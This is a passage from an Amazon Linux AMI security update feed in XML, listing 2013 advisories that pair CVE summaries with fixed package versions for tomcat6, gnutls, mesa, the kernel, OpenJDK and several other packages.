arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-29.38.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.392" release="29.38.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.392-29.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-196</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-196: important priority package update for tomcat6</title><issued date="2013-06-11 22:44:00" /><updated date="2014-09-15 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1976:
927622:
CVE-2013-1976 tomcat: Improper TOMCAT_LOG management in init script (DoS, ACE)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1976" title="" id="CVE-2013-1976" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-admin-webapps" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.37-1.1.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.37" release="1.1.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.37-1.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2013-197</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-197: important priority package update for gnutls</title><issued date="2013-06-11 22:44:00" /><updated date="2014-09-15 23:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2116:
It was discovered that the fix for the CVE-2013-1619 issue released via RHSA-2013:0588 introduced a regression in the way GnuTLS decrypted TLS/SSL encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to crash a server or client application that uses GnuTLS.
CVE-2013-1619:
It was discovered that the fix for the CVE-2013-1619 issue released via RHSA-2013:0588 introduced a regression in the way GnuTLS decrypted TLS/SSL encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to crash a server or client application that uses GnuTLS.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1619" title="" id="CVE-2013-1619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2116" title="" id="CVE-2013-2116" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0883.html" title="" id="RHSA-2013:0883" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-10.10.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-10.10.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-10.10.amzn1.i686.rpm</filename></package><package 
name="gnutls-guile" version="2.8.5" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-198</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-198: medium priority package update for mesa</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1993:
It was found that Mesa did not correctly validate messages from the X server. A malicious X server could cause an application using Mesa to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2013-1872:
An out-of-bounds access flaw was found in Mesa. If an application using Mesa exposed the Mesa API to untrusted inputs (Mozilla Firefox does this), an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1872" title="" id="CVE-2013-1872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1993" title="" id="CVE-2013-1993" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0897.html" title="" id="RHSA-2013:0897" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mesa-debuginfo" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-debuginfo-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libOSMesa" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libOSMesa-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGLU" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGLU-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="glx-utils" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/glx-utils-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGL-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGL-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGL" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGL-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libGLU-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libGLU-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="mesa-libOSMesa-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mesa-libOSMesa-devel-9.0-0.8.15.amzn1.x86_64.rpm</filename></package><package name="glx-utils" version="9.0" release="0.8.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/glx-utils-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGL-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGL-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-debuginfo" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-debuginfo-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGL" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGL-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGLU" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGLU-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libGLU-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libGLU-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libOSMesa-devel" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libOSMesa-devel-9.0-0.8.15.amzn1.i686.rpm</filename></package><package name="mesa-libOSMesa" version="9.0" release="0.8.15.amzn1" epoch="0" arch="i686"><filename>Packages/mesa-libOSMesa-9.0-0.8.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-199</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-199: medium priority package update for libtirpc</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1950:
A flaw was found in the way libtirpc decoded RPC requests. A specially-crafted RPC request could cause libtirpc to attempt to free a buffer provided by an application using the library, even when the buffer was not dynamically allocated. This could cause an application using libtirpc, such as rpcbind, to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1950" title="" id="CVE-2013-1950" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0884.html" title="" id="RHSA-2013:0884" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc-debuginfo" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.1" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.1-6.8.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.1-6.8.amzn1.i686.rpm</filename></package><package name="libtirpc" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.1-6.8.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.1" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.1-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-200</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-200: medium priority package update for kernel</title><issued date="2013-06-11 22:45:00" /><updated date="2014-09-15 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3235:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3231:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3224:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3222:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-1929:
* A heap-based buffer overflow in the way the tg3 Ethernet driver parsed the vital product data (VPD) of devices could allow an attacker with physical access to a system to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-1773:
Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.
916115:
CVE-2013-1773 kernel: VFAT slab-based buffer overflow
* A buffer overflow flaw was found in the way UTF-8 characters were converted to UTF-16 in the utf8s_to_utf16s() function of the Linux kernel's FAT file system implementation. A local user able to mount a FAT file system with the "utf8=1" option could use this flaw to crash the system or, potentially, to escalate their privileges.
CVE-2013-1767:
Use-after-free vulnerability in the shmem_remount_fs function in mm/shmem.c in the Linux kernel before 3.7.10 allows local users to gain privileges or cause a denial of service (system crash) by remounting a tmpfs filesystem without specifying a required mpol (aka mempolicy) mount option.
915592:
CVE-2013-1767 Kernel: tmpfs: fix use-after-free of mempolicy object
* A use-after-free flaw was found in the tmpfs implementation. A local user able to mount and unmount a tmpfs file system could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-0914:
* An information leak was found in the Linux kernel's POSIX signals implementation. A local, unprivileged user could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-6545:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2012-6544:
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6544" title="" id="CVE-2012-6544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6545" title="" id="CVE-2012-6545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0914" title="" id="CVE-2013-0914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1767" title="" id="CVE-2013-1767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1773" title="" id="CVE-2013-1773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1929" title="" id="CVE-2013-1929" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3222" title="" id="CVE-2013-3222" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3224" title="" id="CVE-2013-3224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3231" title="" id="CVE-2013-3231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3235" title="" id="CVE-2013-3235" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.4.48" release="45.46.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-headers-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.4.48-45.46.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel" version="3.4.48" release="45.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.4.48-45.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.4.48" release="45.46.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-3.4.48-45.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-201</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-201: low priority package update for openvpn</title><issued date="2013-06-11 22:47:00" /><updated date="2014-09-15 23:12:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2061:
960192:
CVE-2013-2061 openvpn: use of non-constant-time memcmp in HMAC comparison in openvpn_decrypt
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2061" title="" id="CVE-2013-2061" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-debuginfo" version="2.3.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.1-1.7.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.1" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.1-1.7.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.3.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.1-1.7.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.1" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.1-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-202</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-202: medium priority package update for socat</title><issued date="2013-06-20 14:13:00" /><updated date="2014-09-15 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3571:
967345:
CVE-2013-3571 socat: Denial of service due to file descriptor leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3571" title="" id="CVE-2013-3571" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="socat" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-1.7.2.2-1.8.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/socat-debuginfo-1.7.2.2-1.8.amzn1.x86_64.rpm</filename></package><package name="socat-debuginfo" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/socat-debuginfo-1.7.2.2-1.8.amzn1.i686.rpm</filename></package><package name="socat" version="1.7.2.2" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/socat-1.7.2.2-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-203</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-203: important priority package update for nrpe</title><issued date="2013-06-20 14:14:00" /><updated date="2014-09-15 23:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1362:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362" title="" id="CVE-2013-1362" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios-plugins-nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-plugins-nrpe-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nrpe-debuginfo" version="2.14" release="3.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nrpe-debuginfo-2.14-3.5.amzn1.x86_64.rpm</filename></package><package name="nagios-plugins-nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-plugins-nrpe-2.14-3.5.amzn1.i686.rpm</filename></package><package name="nrpe" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-2.14-3.5.amzn1.i686.rpm</filename></package><package name="nrpe-debuginfo" version="2.14" release="3.5.amzn1" epoch="0" arch="i686"><filename>Packages/nrpe-debuginfo-2.14-3.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-204</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-204: important priority package update for java-1.7.0-openjdk</title><issued date="2013-06-20 14:14:00" /><updated date="2014-09-15 23:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2473:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2472:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2471:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2470:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2469:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2465:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2463:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2461:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-2460:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2459:
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
CVE-2013-2458:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2457:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2456:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2455:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2454:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2453:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2452:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2450:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2449:
It was discovered that GnomeFileTypeDetector did not check for read permissions when accessing files. An untrusted Java application or applet could possibly use this flaw to disclose potentially sensitive information.
CVE-2013-2448:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2447:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2446:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2445:
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine.
CVE-2013-2444:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2443:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2412:
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information.
CVE-2013-2407:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-1571:
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation.
CVE-2013-1500:
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500" title="" id="CVE-2013-1500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571" title="" id="CVE-2013-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407" title="" id="CVE-2013-2407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412" title="" id="CVE-2013-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443" title="" id="CVE-2013-2443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444" title="" id="CVE-2013-2444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445" title="" id="CVE-2013-2445" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446" title="" id="CVE-2013-2446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447" title="" id="CVE-2013-2447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448" title="" id="CVE-2013-2448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2449" title="" id="CVE-2013-2449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450" title="" id="CVE-2013-2450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452" title="" id="CVE-2013-2452" type="cve" /><reference 